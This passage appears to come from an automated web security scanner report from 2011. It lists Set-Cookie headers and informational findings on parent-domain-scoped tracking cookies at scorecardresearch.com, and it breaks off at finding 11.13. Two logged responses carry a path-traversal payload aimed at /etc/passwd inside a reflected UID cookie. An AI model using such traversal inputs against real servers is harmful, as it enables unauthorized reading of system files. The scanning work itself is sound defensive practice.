Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sZLs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qEBt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GPFg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HG8X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AMrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L9DA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1djr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_R2Sk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tqia=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_W0Nw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wjT0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OVF5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xj6q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Tn_F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Xy4W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7q1i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3mus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9AUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nDzG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_41iQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_70NL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lLND=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_WJEP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ew4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Av4C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KbQB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VU1j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tsTn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RqxL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_CYmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3BOa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dhOx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gXRf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_w1GX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_91sR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5Xxa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xUzf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RS6A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_rX_Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ynys=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xND8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_U2-d=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_S-vO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HG7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_id7F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2D0P=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_M1Z_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2RcV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fldA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_i0tL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4m8k=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ppkq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_G93Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JCjG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yHyN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_C5Uh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8olB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kFhz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JeGp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Re8S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pDeg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wxyS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VyjV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JsaM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1p6o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VIa5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zc6p=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ptuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AlmC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__Yzb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_k7NG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dpiY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OLBq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D3J-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Tpuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MnS9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bpmx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gx4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OGcW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4g95=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gjH6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GCsG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l41s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nSTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zd-e=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Dpzn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AnWT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jcjr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wDL0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GNkZ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Mzt2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_A76z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pLOm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4cFc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kaha=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ar9b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Iei_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h03W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QYQn="MLtXrt8vtl9rIAF9m8HM9CRwtSv8pwYgsssFOu5OTeOlKAZz5+/wuXtI5aPioHhhdEjAIagkY/G8GHOoPBTZKbe4LvfbnbdkKhONXmKkgHQgdLckCXP0Ycf6bL86yMYbL1uMiqL/s6MNej7gFcLrWQkAx8c6IYdi+yDQifN3Qycz6Jj1em6Y5Eay9ZRgmRVQd4wL1CPn/dRQ4JoZ5iAZWwFtgtxpYZ2eGJoLULxN8vLRSvbSAvOi3Mra/1wX6oTWmDs4ThHYmdgsHYPtkd1lfMJC8ZS8jNp4O4oZuhx+vDf6G8BYd19mNkCBOkzH6Y5GDSLMLc63IB0="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:57:01 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.10. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035630&c3=&c4=&c5=&c6=&c15=&ns__t=1315097328739&ns_c=UTF-8&c8=Notre%20Dame%2C%20Michigan%20stadiums%20cleared%20due%20to%20storms%20%7C%20Reuters&c7=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&c9=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:48:11 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.11. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=7&c2=2000002&c3=1&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:52:26 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:52:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.12. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=189535721&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 01:06:36 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:06:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.13. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

